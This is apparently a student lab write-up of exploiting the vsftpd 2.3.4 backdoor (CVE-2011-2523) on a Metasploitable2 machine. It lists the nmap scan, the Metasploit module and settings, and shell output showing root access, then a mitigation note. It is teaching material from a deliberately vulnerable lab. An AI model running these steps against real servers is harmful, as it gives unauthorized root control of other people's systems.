Share
## https://sploitus.com/exploit?id=4D01A3A1-75C7-5730-8C5D-B2EC1F56532F
# Exploiting-FTP-Service-Port-21-on-Metasploitable2
1. Objective
The purpose of this lab is to demonstrate the process of identifying a service vulnerability and exploiting a known backdoor in the vsftpd 2.3.4 service to gain unauthorized root access to a target machine.

2. Lab EnvironmentAttacker Machine:
Kali Linux (IP: 192.168.226.129).Target Machine: Metasploitable2 (IP: 192.168.226.130).Software Used: Zenmap/Nmap, Metasploit Framework (MSF).

3. Phase 1: Information Gathering & Scanning:
I started by scanning the target machine to identify open ports and service versions.
  Tool: Zenmap (Intense Scan).
  Action: Running nmap -T4 -A -v 192.168.226.130.
  Findings: The scan revealed that Port 21 (TCP) is open and running vsftpd 2.3.4

4. Phase 2: Vulnerability Analysis:
  Researching the identified version (vsftpd 2.3.4) revealed it is notoriously vulnerable to a "Backdoor Command Execution" flaw (CVE-2011-2523).
  Exploit Discovery: I searched for a compatible module within the Metasploit Framework.
  msf > search vsftpd 2.3.4.
  Result: exploit/unix/ftp/vsftpd_234_backdoor

5. Phase 3: Exploitation:
I configured the exploit module to target the machine's IP address.
  Selection: use exploit/unix/ftp/vsftpd_234_backdoor.
  Configuration: Set the target IP.
  set RHOSTS 192.168.226.130.
  Execution: Ran the exploit command
Success Evidence:
  The exploit successfully triggered the backdoor service. A command shell was spawned immediately.
    192.168.226.130:21 - Backdoor service has been spawned, handling....
    Command shell session 1 opened.
   
6. Phase 4: Post-Exploitation:
After gaining access, I verified the level of control over the target.
  Command: pwd and id.
  Observation: The shell returned uid=0(root), confirming full administrative access to the system.

7. Conclusion & Mitigation:
The exploit was successful due to the use of an outdated and compromised service version.
  Mitigation: The service should be updated to a secure, patched version of vsftpd or replaced with a more secure FTP alternative.